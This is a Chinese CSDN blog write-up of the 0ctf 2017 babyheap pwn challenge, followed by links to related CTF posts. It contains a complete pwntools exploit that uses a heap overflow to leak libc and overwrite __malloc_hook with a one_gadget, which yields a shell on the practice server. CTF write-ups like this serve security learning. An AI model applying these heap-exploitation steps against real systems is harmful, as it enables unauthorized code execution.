0ctf_2017_babyheap

最新推荐文章于 2022-09-06 14:54:30 发布
最新推荐文章于 2022-09-06 14:54:30 发布
阅读量133 收藏
点赞数 1
分类专栏: 二进制漏洞 # glibc 2.24
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46441427/article/details/119684742
版权

思路

查看了一下ida后,发现有堆溢出漏洞
那可以利用unsorted bin 泄露main arena的地址,然后在malloc_hook处构造fake_chunk ,利用one_gadget在malloc_hook写入函数值,可以getshell
ps:注意本地libc的问题

exp及具体分析

from pwn import*

context.log_level = 'debug'
#p = process('./babyheap')

p = remote('node4.buuoj.cn','28992')
lib = ELF('./libc-2.23.so')
def alloc(size):
    p.sendlineafter(': ','1')
    p.sendlineafter(': ',str(size))

def edit(idx,size,content):
    p.sendlineafter(': ','2')
    p.sendlineafter(': ',str(idx))
    p.sendlineafter(": ",str(size))
    p.sendlineafter(": ",content)

def delete(idx):
    p.sendlineafter(': ','3')
    p.sendlineafter(': ',str(idx))

def show(idx):
    p.sendlineafter(': ','4')
    p.sendlineafter(': ',str(idx))

alloc(0x10)#0
alloc(0x20)#1
alloc(0x80)#2
alloc(0x10)#3
alloc(0x68)#4
alloc(0x50)#avoid topchunk

payload = p64(0)*3+p64(0xc1)
edit(0,len(payload),payload)#heap overflow 
delete(1)
alloc(0xb0)#unsortedbin overlap
payload = p64(0)*5 + p64(0x91)
edit(1,len(payload),payload)
delete(2)
show(1)#show(1) can dump the content of chunk(2)

libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) -0x3c4b78##0x3c4b78 is a abiding address of ubuntu16
malloc_hook = libc_base + lib.symbols['__malloc_hook']

delete(4)

payload = p64(0)*3 + p64(0x71)+ p64(malloc_hook-0x23) 
edit(3,len(payload),payload)

alloc(0x68)#unsorted bin is FIFO
alloc(0x68)#malloc_hook - 0x23


one = [0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget = libc_base + one[1]

payload = '\x00'*0x13 + p64(one_gadget)
edit(4,len(payload),payload)#edit malloc_hook

#gdb.attach(p)
alloc(0x10)#getshell
#pause()
p.interactive()

在这里插入图片描述

Akura@lan
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界crypto进阶区之sherlock
qq_46927150的博客
05-07 3443
sherlock 题目来源: bitsctf-2017 附件是一本书的内容,发现有些字母莫名地大写 将大写字母提取出来 补充知识: 用法: grep [选项]… 模式 [文件]… -E, --extended-regexp <模式> 是扩展正则表达式 -o, --only-matching 只显示行中非空匹配部分 [] #匹配一个指定范围内的字符,如’[Gg]r...
180531 逆向-SUCTF(Enigma)
whklhhhh的博客
05-31 1137
Enigma 恩尼格码是一个由德国人亚瑟·斯雪比尤斯发明的密码机,开创了自动化加密的先河。简单来说,恩尼格码密码机利用三个转子对字母顺序进行偏移,相当于三重维吉尼亚。除此以外还有一块可以改变字母对应顺序的连接板。 恩尼格码这个密码机也算比较出名了,做题之前先去回忆了一下恩尼格码的原理。(后来发现完全没用orz 打开main函数,跳过字符画后的流程很简单 接受输入-校验长度-...
0ctf-2017-babyheap图解
segogt的博客
01-31 1830
刚入门pwn的菜鸡选手看这个最简单的堆题都看了好久,在这里写一下自己的分析做备忘,也希望能帮助那些跟我一样刚刚接触堆的萌新。 主要思路就是: fastbin attack unsortedbin attack 泄露libc地址 malloc_hook劫持程序流 程序分析 因为markdown画图不太熟悉,就用其他软件画了图。 先放exp,因为下面的图是根据exp画的。 #!/usr/bin...
0ctf Babyheap 2017
Bill
03-11 6395
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
babyheap_0ctf_2017
m0sway的博客
11-25 524
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2792
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
0ctf_tctf_2018
05-16
0 CTF / TCTF 2018 0CTF / TCTF 2018决赛中的一些加密挑战
ctf_vm.zip
05-15
【CTF(Capture The Flag)VM(Virtual Machine)详解】\n\nCTF,全称为“Capture The Flag”,中文常译为“夺旗赛”,是一种网络安全领域的竞技活动,旨在通过解决各种安全挑战来提升参赛者的技能。CTF VM,即在...
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3790
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
0CTF-babyheap2017祥讲
Jc
07-26 452
解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 安全机制全部开启了,其实不用慌,对我们做题影响不是很大 运行 ## IDA ...
BUUCTF 0ctf_2017_babyheap
m0_57754423的博客
02-15 210
简单说一下这个题目的思路: 1.泄露libc: 编辑chunk的时候存在堆溢出,可以通过堆溢出,修改两个不同的指针,指向同一个chunk,随后free掉其中一个,即可dump其中内存,main_arena的地址。 2.同样再次利用堆溢出,修改其中一个chunk的fd指针为__malloc_hook,然后修改malloc_hook为one_gadget。 这里解答一个疑惑,为什么不写got表? 1,首先 RELRO保护全开,是不可写的。 2,其次,bss段上很难找到数据通过size检查。 完整.
BUUCTF:0ctf_2017_babyheap
weixin_51055545的博客
01-07 1597
一天一道buu 今天做了这道堆题没有想象的难,毕竟是道1分的题 例行检查 64位程序,保护机制全开的,放到IDA 漏洞分析 漏洞在edit()函数中,我们add()之后,在edit()时,能再次控制size的大小,存在堆溢出。 分析好漏洞后,就开始利用 利用思路和分析 1.我们先利用堆溢出泄露出libc地址 2.劫持fd指针到malloc_hook,覆盖malloc_hook为one_gadget,当再次申请堆块时调用one_gadget,从而get shell 分析 首先堆布局,申请0x100的堆,释放
0CTF-2017-web-writeup
dengzhasong7076的博客
03-20 230
xss搞的很爽... complicated xss 题目描述:The flag is in http://admin.government.vip:8000 两个xss点。 1、http://government.vip/ 存储型xss,未做过滤,管理员会触发此xss 202.120.7.205 - - [20/Mar/2017:14:26:18 +0800] "GET /aaakkk...
0ctf2017-babypwn
CharlesGodX的博客
09-10 823
前言 本片文章从0ctf2017-babyheap这一道pwn题目入手,讲解pwn堆中的一些利用手法 题目链接 分析程序 首先检查程序保护,所有的保护措施都是开启的,这意味着我们想要改写程序流程考虑从malloc_hook和free_hook入手 [*] '/home/thunder/Desktop/codes/ctf/pwn/heap/0ctf_babyheap/0ctfbabyheap' ...
ctf_awd_platform
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值